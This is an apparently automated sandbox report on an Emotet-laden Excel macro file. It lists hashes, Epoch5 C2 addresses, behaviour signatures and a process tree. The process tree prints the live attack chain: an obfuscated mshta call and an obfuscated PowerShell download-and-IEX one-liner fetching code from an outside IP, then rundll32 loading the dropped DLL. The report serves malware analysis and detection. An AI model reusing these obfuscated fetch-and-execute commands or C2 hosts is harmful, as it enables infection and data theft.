Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    19-01-2022 10:06

General

  • Target

    086135335.xlsm

  • Size

    114KB

  • MD5

    254ffcdec7238f1444fe24932ce54457

  • SHA1

    f279f9375c94edc055cb29d3d511c2b984eea05a

  • SHA256

    bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc

  • SHA512

    559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\086135335.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3412
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1468
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku",FUBgEnAdK
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1544
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Iowdvjqb\kclggbsegem.tku",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2580
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3148 -s 1724
          4⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1072
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 408 -p 3148 -ip 3148
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:1316

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • C:\Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • C:\Users\Public\Documents\ssd.dll
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku
    MD5

    fcdd109bcdb88089e05aa9dda588ec32

    SHA1

    2ae8c17b9401869aac6db6ceb087eb24083dc317

    SHA256

    634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8

    SHA512

    7d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e

  • memory/1468-185-0x0000000004B30000-0x0000000004B58000-memory.dmp
    Filesize

    160KB

  • memory/1468-194-0x0000000004F70000-0x0000000004F98000-memory.dmp
    Filesize

    160KB

  • memory/1468-191-0x0000000004F10000-0x0000000004F38000-memory.dmp
    Filesize

    160KB

  • memory/1468-189-0x0000000004C90000-0x0000000004CB8000-memory.dmp
    Filesize

    160KB

  • memory/1468-187-0x0000000004C30000-0x0000000004C58000-memory.dmp
    Filesize

    160KB

  • memory/1544-196-0x00000000042A0000-0x00000000042C8000-memory.dmp
    Filesize

    160KB

  • memory/1644-184-0x000001A4D6A70000-0x000001A4D6AE6000-memory.dmp
    Filesize

    472KB

  • memory/1644-168-0x000001A4D63F0000-0x000001A4D6412000-memory.dmp
    Filesize

    136KB

  • memory/1644-169-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp
    Filesize

    385.4MB

  • memory/1644-171-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp
    Filesize

    385.4MB

  • memory/1644-173-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp
    Filesize

    385.4MB

  • memory/1644-174-0x000001A4D69A0000-0x000001A4D69E4000-memory.dmp
    Filesize

    272KB

  • memory/1688-137-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmp
    Filesize

    64KB

  • memory/1688-131-0x00007FFF20070000-0x00007FFF20080000-memory.dmp
    Filesize

    64KB

  • memory/1688-133-0x00007FFF20070000-0x00007FFF20080000-memory.dmp
    Filesize

    64KB

  • memory/1688-130-0x00007FFF20070000-0x00007FFF20080000-memory.dmp
    Filesize

    64KB

  • memory/1688-132-0x00007FFF20070000-0x00007FFF20080000-memory.dmp
    Filesize

    64KB

  • memory/1688-134-0x00007FFF20070000-0x00007FFF20080000-memory.dmp
    Filesize

    64KB

  • memory/1688-138-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmp
    Filesize

    64KB

  • memory/2580-199-0x0000000004CD0000-0x0000000004CF8000-memory.dmp
    Filesize

    160KB

  • memory/2580-203-0x0000000005580000-0x00000000055A8000-memory.dmp
    Filesize

    160KB

  • memory/2580-205-0x00000000055E0000-0x0000000005608000-memory.dmp
    Filesize

    160KB

  • memory/2580-207-0x0000000005780000-0x00000000057A8000-memory.dmp
    Filesize

    160KB

  • memory/2580-209-0x00000000057E0000-0x0000000005808000-memory.dmp
    Filesize

    160KB

  • memory/2580-211-0x00000000058E0000-0x0000000005908000-memory.dmp
    Filesize

    160KB

  • memory/2580-213-0x00000000059C0000-0x00000000059E8000-memory.dmp
    Filesize

    160KB

  • memory/3764-177-0x0000000004DA0000-0x0000000004DC8000-memory.dmp
    Filesize

    160KB